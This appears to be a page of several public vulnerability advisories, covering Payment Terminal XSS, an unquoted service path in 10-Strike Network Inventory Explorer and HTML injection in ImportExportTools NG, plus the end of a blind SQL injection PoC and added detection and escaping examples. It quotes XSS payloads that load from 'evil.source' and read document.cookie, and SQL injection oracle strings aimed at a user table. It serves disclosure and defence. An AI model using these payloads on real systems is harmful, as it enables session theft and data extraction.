            print("You can reset the password : " + reset_password_url)

print("TARGET URL ex: https://[redacted]/index.php?route=product/product&product_id=[product_id]")
target = input("Target URL : ")
TmdSqli(target)
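As a defender's counterpart to the PoC above, here is an added example (not part of the original exploit or the vendor's code) that scans Combined Log Format access-log lines for the request sequence this script produces: the `' AND 1=1` / `' AND 1=0` pair and the `LENGTH(CONCAT(...))` and `ASCII(SUBSTRING(...))` oracle subqueries in a query parameter, with the number of distinct user agents per client as a second signal, since `set_user_agent()` picks a random one for every request. The log lines are constructed for the example; the IP addresses are documentation ranges.

```python
"""Detect the boolean-based blind SQLi probes from the advisory above in
access logs. Added example; log lines are constructed, not real traffic."""
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Patterns lifted from the payloads the PoC sends: the 1=1 / 1=0 pair and the
# per-character oracle subqueries. '--+-' arrives as '-- -' after URL
# decoding, so each pattern stops at the comment opener.
PROBE_PATTERNS = {
    "boolean_pair": re.compile(r"'\s*AND\s+1\s*=\s*[01]\s*--", re.I),
    "length_oracle": re.compile(r"SELECT\s+LENGTH\s*\(\s*CONCAT\s*\(", re.I),
    "char_oracle": re.compile(r"SELECT\s+ASCII\s*\(\s*SUBSTRING\s*\(", re.I),
}

# Apache/nginx Combined Log Format; only client IP, request target and
# user agent are used below.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)


def classify_request(target: str):
    """Return [(param, probe_name), ...] for every query parameter that
    carries one of the probe patterns; [] for a clean request."""
    hits = []
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        decoded = unquote_plus(value)   # second pass catches double encoding
        for probe, pattern in PROBE_PATTERNS.items():
            if pattern.search(decoded):
                hits.append((name, probe))
    return hits


def analyze_log(log_text: str):
    """Aggregate probe hits per client IP.

    Returns {ip: {"probes": n, "params": set, "kinds": set, "user_agents": set}}.
    Many distinct user agents from one IP within seconds is the second
    signal: the PoC picks a random UA from a public list for every request."""
    report = {}
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        hits = classify_request(m["target"])
        if not hits:
            continue
        entry = report.setdefault(m["ip"], {
            "probes": 0, "params": set(), "kinds": set(), "user_agents": set()})
        entry["probes"] += 1
        entry["params"].update(p for p, _ in hits)
        entry["kinds"].update(k for _, k in hits)
        entry["user_agents"].add(m["ua"])
    return report


# Constructed sample: one client walking the PoC's request sequence against
# product_id, and one ordinary visitor.
LOG_LINES = """\
203.0.113.5 - - [03/Nov/2021:10:00:01 +0000] "GET /index.php?route=product/product&product_id=42 HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (X11; Linux x86_64)"
203.0.113.5 - - [03/Nov/2021:10:00:02 +0000] "GET /index.php?route=product/product&product_id=42%27%20AND%201=1--+- HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (Windows NT 10.0)"
203.0.113.5 - - [03/Nov/2021:10:00:03 +0000] "GET /index.php?route=product/product&product_id=42%27%20AND%201=0--+- HTTP/1.1" 200 4102 "-" "Mozilla/5.0 (Macintosh)"
203.0.113.5 - - [03/Nov/2021:10:00:04 +0000] "GET /index.php?route=product/product&product_id=42%27%20AND%20(SELECT%20LENGTH(CONCAT(username,0x3a,email))%20FROM%20oc_user%20LIMIT%200,1)=1--+- HTTP/1.1" 200 4102 "-" "Mozilla/5.0 (iPhone)"
203.0.113.5 - - [03/Nov/2021:10:00:05 +0000] "GET /index.php?route=product/product&product_id=42%27%20AND%20(SELECT%20ASCII(SUBSTRING(CONCAT(username,0x3a,email),1,1))%20FROM%20oc_user%20LIMIT%200,1)=97--+- HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (Android)"
198.51.100.9 - - [03/Nov/2021:10:00:06 +0000] "GET /index.php?route=product/product&product_id=17 HTTP/1.1" 200 6010 "-" "Mozilla/5.0 (X11; Linux x86_64)"
"""

if __name__ == "__main__":
    for ip, entry in analyze_log(LOG_LINES).items():
        print(ip, entry["probes"], sorted(entry["kinds"]), len(entry["user_agents"]))
```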
            
# Exploit Title: Payment Terminal 3.1 - 'Multiple' Cross-Site Scripting (XSS)
# Date: 2021-11-05
# Exploit Author: Vulnerability Lab
# Vendor Homepage: https://www.criticalgears.com/
# Software Link: https://www.criticalgears.com/product/authorize-net-payment-terminal/ , https://www.criticalgears.com/product/paypal-pro-payment-terminal/ , https://www.criticalgears.com/product/stripe-payment-terminal/
# Version: 2.4.1, 2.2.1 & 3.1
# Tested on: Linux (Apache)

Document Title:
===============
Payment Terminal 2.x & v3.x - Multiple XSS Web Vulnerabilities


References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2280


Release Date:
=============
2021-11-05


Vulnerability Laboratory ID (VL-ID):
====================================
2280


Common Vulnerability Scoring System:
====================================
5.2


Vulnerability Class:
====================
Cross Site Scripting - Non Persistent


Current Estimated Price:
========================
500€ - 1.000€


Product & Service Introduction:
===============================
Quick and easy payment terminal as script for clients to pay for products and services.

(Copy of the Homepage: https://www.criticalgears.com/product/authorize-net-payment-terminal/ )
(Copy of the Homepage: https://www.criticalgears.com/product/paypal-pro-payment-terminal/ )
(Copy of the Homepage: https://www.criticalgears.com/product/stripe-payment-terminal/ )


Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered a cross site scripting vulnerability in the Authorize.net Payment Terminal v2.4.1.
The vulnerability laboratory core research team discovered a cross site scripting vulnerability in the Stripe Payment Terminal v2.2.1.
The vulnerability laboratory core research team discovered a cross site scripting vulnerability in the PayPal PRO Payment Terminal v3.1.


Affected Product(s):
====================
CriticalGears
Product: Authorize.net Payment Terminal v2.4.1 - Payment Form Script (PHP) (Web-Application)
Product: Stripe Payment Terminal v2.2.1 - Payment Form Script (PHP) (Web-Application)
Product: PayPal PRO Payment Terminal v3.1 - Payment Form Script (PHP) (Web-Application)


Vulnerability Disclosure Timeline:
==================================
2021-08-22: Researcher Notification & Coordination (Security Researcher)
2021-08-23: Vendor Notification (Security Department)
2021-**-**: Vendor Response/Feedback (Security Department)
2021-**-**: Vendor Fix/Patch (Service Developer Team)
2021-**-**: Security Acknowledgements (Security Department)
2021-11-05: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Medium


Authentication Type:
====================
Pre Auth (No Privileges or Session)


User Interaction:
=================
Low User Interaction


Disclosure Type:
================
Responsible Disclosure


Technical Details & Description:
================================
Multiple non-persistent cross site scripting web vulnerabilities have been discovered in the official Authorize.net Payment Terminal v2.4.1,
the PayPal PRO Payment Terminal v3.1 and the Stripe Payment Terminal v2.2.1. The vulnerability allows remote attackers to inject their own
malicious script code via a non-persistent attack vector to compromise client-side browser to web-application requests.

The non-persistent cross site scripting web vulnerabilities are located in the `item_description`, `fname`, `lname`, `address`, `city` and `email`
parameters of the `Billing Information` and `Payment Information` forms. Attackers are able to inject their own malicious script code into the
`Description`, `Firstname`, `Lastname`, `Address`, `City` and `Email` input fields to manipulate client-side requests. The request method to
inject is POST and the attack vector is non-persistent on the client side. Where the form is embedded in another web service, attackers
are able to exploit the bug by triggering execution of the script code in the invalid exception handling.

The PayPal PRO Payment Terminal v3.1 and the Stripe Payment Terminal v2.2.1 share the same vulnerable script and are affected by the same
simple validation vulnerability as well.

Successful exploitation of the vulnerabilities results in session hijacking, non-persistent phishing attacks, non-persistent external
redirects to malicious sources and non-persistent manipulation of affected application modules.

Request Method(s):
[+] POST

Vulnerable Module(s):
[+] Billing Information
[+] Payment Information

Vulnerable Input(s):
[+] Description
[+] Firstname
[+] Lastname
[+] Address
[+] City
[+] Email

Vulnerable Parameter(s):
[+] item_description
[+] fname
[+] lname
[+] address
[+] city
[+] email

Affected Module(s):
[+] Exception Handling (Invalid)


Proof of Concept (PoC):
=======================
The client-side cross site scripting web vulnerability can be exploited by remote attackers without an account and with low or medium user interaction.
For security demonstration or to reproduce the cross site scripting web vulnerability, follow the information and steps provided below.


Exploitation: Payload
">%20<iframe src=evil.source onload=alert(document.domain)>%20</iframe>
">%20<iframe src=evil.source onload=alert(document.cookie)>%20</iframe>


Vulnerable Source: Invalid (Exception-Handling - onkeyup checkFieldBack)
<div id="accordion">
<!-- PAYMENT BLOCK -->
<h2 class="current">Payment Information</h2>
<div class="pane" style="display:block">
<label>Description:</label>
<input name="item_description" id="item_description" type="text" class="long-field" value="">
<iframe src=evil.source onload=alert(document.domain)>%20</iframe> onkeyup="checkFieldBack(this);"
<div class="clr"></div>
<label>Amount:</label>
<input name="amount" id="amount" type="text" class="small-field" value="1.00" onkeyup="checkFieldBack(this);noAlpha(this);" onkeypress="noAlpha(this);">
<div class="clr"></div>
</div>
<!-- PAYMENT BLOCK -->
-
<!-- BILLING BLOCK -->
<h2>Billing Information</h2>
<div class="pane">
<label>First Name:</label>
<input name="fname" id="fname" type="text" class="long-field" value="">"><iframe src=evil.source onload=alert(document.domain)>%20</iframe> onkeyup="checkFieldBack(this);" />
<div class="clr"></div>
<label>Last Name:</label>
<input name="lname" id="lname" type="text" class="long-field" value=""><iframe src=evil.source onload=alert(document.domain)>%20</iframe> onkeyup="checkFieldBack(this);" />
<div class="clr"></div>
<label>Address:</label>
<input name="address" id="address" type="text" class="long-field" value=""><iframe src=evil.source onload=alert(document.domain)>%20</iframe> onkeyup="checkFieldBack(this);" />
<div class="clr"></div>
<label>City:</label>
<input name="city" id="city" type="text" class="long-field" value=""><iframe src=evil.source onload=alert(document.domain)>%20</iframe> onkeyup="checkFieldBack(this);" />
<div class="clr"></div>


--- PoC Session Logs (POST) ---
https://autherminal.localhost:8080/authorize-terminal/
Host: autherminal.localhost:8080
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Content-Type: multipart/form-data; boundary=---------------------------317816260230756398612099882125
Content-Length: 3270
Origin:https://autherminal.localhost:8080
Connection: keep-alive
Referer:https://autherminal.localhost:8080/authorize-terminal/
Cookie: PHPSESSID=952c12ca44f97e3b4056b731c7455a7c
item_description="><iframe src=evil.source onload=alert(document.domain)>%20</iframe>&amount=1&fname="><iframe src=evil.source onload=alert(document.domain)>%20</iframe>
&lname="><iframe src=evil.source onload=alert(document.domain)>%20</iframe>
&address="><iframe src=evil.source onload=alert(document.domain)>%20</iframe>
&city="><iframe src=evil.source onload=alert(document.domain)>%20</iframe>&country=US&state=-AU-NSW&zip=2411
&email="><iframe src=evil.source onload=alert(document.domain)>%20</iframe>&cctype=V&ccn=4111111111111&ccname=test&exp1=11&exp2=2022&cvv=123
&g-recaptcha-response=03AGdBq26Aocx9i3nRxaDSsQIyF0Avo9p1ozb5407foq4ywp7IEY1Y-q9g14tFgwjjkNItQMhnF
&submit.x=50&submit.y=14&process=yes
-
POST: HTTP/3.0 200 OK
content-type: text/html; charset=utf-8
vary: Accept-Encoding


Solution - Fix & Patch:
=======================
The vulnerability can be patched by a secure restriction of the input combined with parsing or escaping of the content.
After that, the value reflected next to the onkeyup checkFieldBack handler should be sanitized correctly to prevent script code execution for clients.


Security Risk:
==============
The security risk of the client-side cross site scripting vulnerability in the web-application is estimated as medium.


Credits & Authors:
==================
Vulnerability-Lab [Research Team] -https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab
or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits
or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do
not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.
We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.

Domains:    www.vulnerability-lab.com           www.vuln-lab.com                        www.vulnerability-db.com
Services:   magazine.vulnerability-lab.com      paste.vulnerability-db.com              infosec.vulnerability-db.com
Social:     twitter.com/vuln_lab                facebook.com/VulnerabilityLab           youtube.com/user/vulnerability0lab
Feeds:      vulnerability-lab.com/rss/rss.php   vulnerability-lab.com/rss/rss_upcoming.php   vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php    vulnerability-lab.com/register.php      vulnerability-lab.com/list-of-bug-bounty-programs.php

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other
information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or
edit our material, contact (admin@ or research@) to ask for permission.

				    Copyright © 2021 | Vulnerability Laboratory - [Evolution Security GmbH]



-- 
VULNERABILITY LABORATORY (VULNERABILITY LAB)
RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE
            
# Exploit Title: 10-Strike Network Inventory Explorer Pro 9.31 - 'srvInventoryWebServer' Unquoted Service Path
# Discovery by: Brian Rodriguez
# Date: 04-11-2021
# Vendor Homepage:  https://www.10-strike.com/
# Software Link: https://www.10-strike.com/networkinventoryexplorer/network-inventory-pro-setup.exe
# Tested Version: 9.31
# Vulnerability Type: Unquoted Service Path
# Tested on: Windows 10 Enterprise 64 bits

# Step to discover Unquoted Service Path:

C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """

srvInventoryWebServer    srvInventoryWebServer   C:\Program Files (x86)\10-Strike Network Inventory Explorer Pro\InventoryWebServer.exe   Auto

C:\>sc qc srvInventoryWebServer
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: srvInventoryWebServer
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files (x86)\10-Strike Network Inventory Explorer Pro\InventoryWebServer.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : srvInventoryWebServer
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem
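As an added example (not part of the advisory), the following Python parses `sc qc` output like the one above and flags the misconfiguration being reported: an image path that is not quoted and contains spaces. It also derives the quoted binPath value an administrator would set. The `sc qc` text is a constructed copy of the output shown above; the function names are hypothetical.

```python
import re

# Constructed sample: a copy of the `sc qc srvInventoryWebServer` output above.
SC_QC_OUTPUT = """\
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: srvInventoryWebServer
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\\Program Files (x86)\\10-Strike Network Inventory Explorer Pro\\InventoryWebServer.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : srvInventoryWebServer
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem
"""


def parse_sc_qc(output: str) -> dict:
    """Turn `sc qc` output into a dict of FIELD -> value (values may be empty)."""
    fields = {}
    for line in output.splitlines():
        m = re.match(r"\s*([A-Z_]+)\s*:\s*(.*?)\s*$", line)
        if m:
            fields[m.group(1)] = m.group(2)
    return fields


def image_and_args(binary_path: str):
    """Split a binPath into the executable image and any trailing arguments."""
    path = binary_path.strip()
    exe_end = path.lower().find(".exe")
    if exe_end == -1:
        return path, ""
    return path[:exe_end + 4], path[exe_end + 4:]


def is_unquoted_with_spaces(binary_path: str) -> bool:
    """The reported weakness: no surrounding quotes and a space inside the
    image path, so the service control manager must guess where the
    executable name ends. Spaces in the arguments alone are not a finding."""
    path = binary_path.strip()
    if path.startswith('"'):
        return False
    image, _ = image_and_args(path)
    return " " in image


def quoted_bin_path(binary_path: str) -> str:
    """The corrected value: wrap the image in quotes, keep the arguments."""
    path = binary_path.strip()
    if path.startswith('"'):
        return path
    image, args = image_and_args(path)
    return f'"{image}"{args}'


def audit(output: str) -> dict:
    """Summarise one service's `sc qc` output for a configuration review."""
    fields = parse_sc_qc(output)
    bin_path = fields.get("BINARY_PATH_NAME", "")
    return {
        "service": fields.get("SERVICE_NAME"),
        "runs_as": fields.get("SERVICE_START_NAME"),
        "auto_start": "AUTO_START" in fields.get("START_TYPE", ""),
        "unquoted": is_unquoted_with_spaces(bin_path),
        "fix": quoted_bin_path(bin_path),
    }
```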
            
# Exploit Title: ImportExportTools NG 10.0.4 - HTML Injection
# Date: 2021-11-05
# Exploit Author: Vulnerability Lab
# Vendor Homepage: https://github.com/thundernest/import-export-tools-ng
# Software Link: https://addons.thunderbird.net/en-US/thunderbird/addon/importexporttools-ng/
# Version: 10.0.4
# Tested on: Windows

Document Title:
===============
ImportExportTools NG 10.0.4 - HTML Injection Vulnerability


References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2308


Release Date:
=============
2021-11-05


Vulnerability Laboratory ID (VL-ID):
====================================
2308


Common Vulnerability Scoring System:
====================================
4.2


Vulnerability Class:
====================
Script Code Injection


Current Estimated Price:
========================
1.000€ - 2.000€


Product & Service Introduction:
===============================
Adds tools to import/export messages and folders (NextGen).

(Copy of the Homepage:https://addons.thunderbird.net/en-US/thunderbird/addon/importexporttools-ng/  )


Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered a persistent validation vulnerability in the official ImportExportTools NG 10.0.4 add-on for Mozilla Thunderbird.


Affected Product(s):
====================
Christopher Leidigh
Product: ImportExportTools NG v10.0.4 - Addon (Mozilla Thunderbird)


Vulnerability Disclosure Timeline:
==================================
2021-10-07: Researcher Notification & Coordination (Security Researcher)
2021-10-08: Vendor Notification (Security Department)
2021-**-**: Vendor Response/Feedback (Security Department)
2021-**-**: Vendor Fix/Patch (Service Developer Team)
2021-**-**: Security Acknowledgements (Security Department)
2021-11-05: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Medium


Authentication Type:
====================
Pre Auth (No Privileges or Session)


User Interaction:
=================
Low User Interaction


Disclosure Type:
================
Responsible Disclosure


Technical Details & Description:
================================
An HTML injection vulnerability has been discovered in the official ImportExportTools NG 10.0.4 add-on for Mozilla Thunderbird.
The vulnerability allows a remote attacker to inject HTML payloads to compromise application data or session credentials.

The vulnerability is located in the HTML export function. The subject content is not sanitized on export the way it is in Thunderbird's
own exports. This allows a remote attacker to send malicious emails with a malformed HTML payload in the subject that executes on preview
after the victim user performs an HTML export.

Vulnerable Module(s):
[+] Export (HTML)


Proof of Concept (PoC):
=======================
The web vulnerability can be exploited by remote attackers without a user account and with low or medium user interaction.
For security demonstration or to reproduce the vulnerability, follow the information and steps provided below.


Manual steps to reproduce the vulnerability ...
1. Install Mozilla Thunderbird
2. Install ImportExportTools NG v10.0.4
3. Use another email account to write to the target inbox where the export takes place
Note: Put any HTML test payload into the subject
4. The target user exports the contents of the inbox as HTML, where the payload executes
5. Successful reproduction of the encoding validation vulnerability!

Note: Some years ago we reported the same issue in KeePass and the Kaspersky Password Manager on HTML exports, and it was successfully resolved there.


Vulnerable Source: ImportExportTools Exported HTML File
<html><head>
<style>
table { border-collapse: collapse; }
th { background-color: #e6ffff; }
th, td { padding: 4px; text-align: left; vertical-align: center; }
tr:nth-child(even) { background-color: #f0f0f0; }
tr:nth-child(odd) { background-color: #fff; }
tr>:nth-child(5) { text-align: center; }
</style>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Posteingang</title>
</head>
<body>
<h2>Posteingang (10/07/2021)</h2><table width="99%" border="1"><tbody><tr><th><b>Betreff</b></th>
<th><b>Von</b></th><th><b>An</b></th><th><b>Datum</b></th><th><b>Anhang</b></th></tr>
<tr><td><a href="Nachrichten/20211007-payload%20in%20subject%20___iframe%20src%3Devil.source%20onload%3Dalert(document.domain)_-151.html">
payload in subject "><iframe src="evil.source" onlo<="" a=""></td>
<td>test@vulnerability-lab.com" <test@vulnerability-</td>
<td>user@test-service.de</td>
<td nowrap>10/07/2021</td>
<td align="center">* </td></tr>


Reference(s):
https://addons.thunderbird.net/de/thunderbird/addon/importexporttools-ng/


Solution - Fix & Patch:
=======================
The output shown in the subject column needs to be encoded and securely sanitized to prevent execution of any listed value.
Restrict the handling of special characters on import/export to prevent further attacks.
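As an added example that is code from neither advisory nor from the vendors, the following Python shows the output-encoding fix both the Payment Terminal and the ImportExportTools NG advisories on this page call for: the reflected form fields get attribute-context escaping, and the exported subject cell gets text-node escaping plus URL encoding of the href filename. The payload is the one quoted in the advisories; the render functions are hypothetical stand-ins for the PHP template and the add-on's export code.

```python
import html
from urllib.parse import quote

# Constructed sample input: the payload string quoted in both advisories.
PAYLOAD = '"><iframe src=evil.source onload=alert(document.domain)>%20</iframe>'


def render_input_unsafe(name: str, value: str) -> str:
    """The reflection pattern the Payment Terminal advisory describes:
    the submitted value is echoed straight back into the value attribute,
    so a leading "> closes the attribute and the tag."""
    return (f'<input name="{name}" id="{name}" type="text" class="long-field" '
            f'value="{value}" onkeyup="checkFieldBack(this);">')


def render_input(name: str, value: str) -> str:
    """Hardened form: html.escape(quote=True) encodes < > & " and ' so the
    value can neither close the attribute nor start a new tag."""
    safe = html.escape(value, quote=True)
    return (f'<input name="{name}" id="{name}" type="text" class="long-field" '
            f'value="{safe}" onkeyup="checkFieldBack(this);">')


def render_export_row(subject: str, sender: str, recipient: str, date: str) -> str:
    """Export table row for the ImportExportTools case. The subject lands in
    two contexts, a text node and the href filename, and each context gets
    its own encoding: HTML escaping for text, percent-encoding for the URL."""
    filename = quote(f"{date.replace('/', '')}-{subject}.html", safe="")
    return (
        "<tr>"
        f'<td><a href="Nachrichten/{filename}">{html.escape(subject)}</a></td>'
        f"<td>{html.escape(sender)}</td>"
        f"<td>{html.escape(recipient)}</td>"
        f"<td nowrap>{html.escape(date)}</td>"
        "</tr>"
    )


def contains_injected_markup(fragment: str, marker: str = "<iframe") -> bool:
    """Review check: does a rendered fragment still contain a raw tag that
    originated in untrusted input?"""
    return marker in fragment
```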


Credits & Authors:
==================
Vulnerability-Lab [admin@vulnerability-lab.com] -https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab

